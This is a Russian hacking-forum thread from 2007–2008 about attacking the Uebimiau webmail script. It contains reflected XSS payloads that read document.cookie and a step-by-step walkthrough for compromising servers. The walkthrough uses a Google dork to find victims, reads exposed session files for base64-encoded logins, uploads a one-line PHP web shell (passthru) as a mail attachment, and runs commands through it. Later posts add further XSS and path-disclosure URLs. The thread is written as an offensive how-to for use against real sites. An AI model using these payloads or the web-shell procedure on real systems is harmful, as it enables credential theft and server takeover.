ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
Пассивная XSS в Uebimiau V2.7.10 и более ранних версиях |
01.09.2007, 19:27
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
Пассивная XSS в Uebimiau V2.7.10 и более ранних версиях
Самая простецкая пассивная XSS в параметре $f_email сценария index.php. Уязвимость существует из-за отсутсвия фильтрации указанного выше параметра:
index.php:
PHP код:
$smarty->display("$selected_theme/login.htm");
файл login.htm (шаблон):
PHP код:
<input type="text" name="f_email" value="{$umEmail}" class="normal" style="width: 140px; border: 1 solid #7F9DB9;">
Пример:
http://old.antichat.ru/webmail/index.php
POST: f_email="><script>alert(document.cookie)</script> (да простят меня вышестоящие =))
P. S. Версию можно узнать из файла
http://site.com/mail/ docs/CHANGELOG.txt
Нашел также раскрытие пути в этом же параметре, когда несколько раз менял значение фунции alert(). Почему работает пока не разобрался, но кажется что-то из-за значения поля Referer.
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
|
|
|
01.09.2007, 20:45
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842
Репутация:
251
|
|
Google: allintitle: UebiMiau
Получаем Shell через UebiMiau Mail Script
Сразу подмечу, что не все системы уязвимы ... всё зависит от администратора сервера, ну и, конечно же, от настройки скрипта.
Способ получение шелла:
1. Идём в Google и пишем: allintitle: UebiMiau
2. Нашёл жертву: http://webmail.victom.com/mail/
3. Пишем:
Код:
http://webmail.victim.com/mail/database/_sessions
4. Если он эту папку откроет, то там наверни, будет файл с длинны названием
{40DD724C8FE70-40DD724C8FE84-1088254540}.usf , открываем его там будет
закодирован в текст в base64
5. декодируем base64
6. Когда разкодируем, получим сессию скрипта:
Код:
[..] a:9:{s:5:"email";s:13:"info@victim.com";s:4:"user";s:3:"info";s:4:"pass";s:3:"abc123";s:6:"server";s [.] [...] s:67:"./database/info_victom.com/trash/236c1dc93c840d1194964cbc8a45ad15.eml"; [..]
Как видна, мы получили логин и пароль от мэйла..
Логин: info
Пароль: abc123
7. Заходим на майл жертвы http://webmail.victom.com/mail/
- создаём новоё письмо (Write E-Mail), и добавляем файл: (Attach new file)
- зарания создаём файл shell.php с содержимым <? passthru($_GET['cmd]);?>
8. Когда добавили файл, болше нечего не надо делать (в смысле не надо заполнять остальные окна и не надо жать не каких кнопок.)
9. Проста, открываем новоё окно browsera, и пишем
Код:
http://webmail.victim.com/mail/database/info_victom.com/_attachments
10. Там будет наш файл тока перед ним будет md5. типа так:
Код:
a7fab2f55de08ab5c4bf23444cd676bbshell.php
11. Мы не думая, пищим:
Код:
http://webmail.victim.com/mail/database/info_victom.com/_attachments/a7fab2f55de08ab5c4bf23444cd676bbshell.php?cmd=mv a7fab2f55de08ab5c4bf23444cd676bbshell.php shell.php
- эта для того, что бы избежать пропадания файла.. иначе он пропадёт..
Ну и в заключение - у нас появился полноценный Shell
http://webmail.victim.com/mail/database/info_victom.com/_attachments/shell.php?cmd=id
Последний раз редактировалось fly; 01.09.2007 в 20:48..
|
|
|
|
01.09.2007, 20:54
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
Да, все это так. Только:
1) На последних версиях это не работает;
2) Индексация директорий, необходимая для атаки - тоже не самая частая вещь =(;
2) Умные админы (например, на g6 - так) вообще 301 ставят на эту директорию.
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
Последний раз редактировалось 1ten0.0net1; 01.09.2007 в 20:56..
|
|
|
|
01.09.2007, 20:59
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842
Репутация:
251
|
|
Да , а когда то это был полный болт!
|
|
|
|
04.11.2008, 21:26
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
оказалось не 1ый '(
1. не обязательно post
http://old.antichat.ru/webmail/index.php?f_email=">xeka
2.ещё xss
http://old.antichat.ru/webmail/badlogin.php?error=<script>confirm(/xeka/)</script>
3. пути
http://old.antichat.ru/webmail/index.php?tid[]=
http://old.antichat.ru/webmail/inc/inc.php
http://old.antichat.ru/webmail/inc/config.php
4.заливка шелла актуальна на ласт.ревах
Сообщение от Uebimiau 2.7.2
...
elseif (is_uploaded_file($userfile) || is_uploaded_file($userfile["tmp_name"])) {
$userfile_name = $userfile["name"];
$userfile_type = $userfile["type"];
$userfile_size = $userfile["size"];
$userfile = $userfile["tmp_name"];
}
...
$filename = $userfolder."_attachments/".md5(uniqid("")).$userfile_name;
move_uploaded_file($userfile, $filename);
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
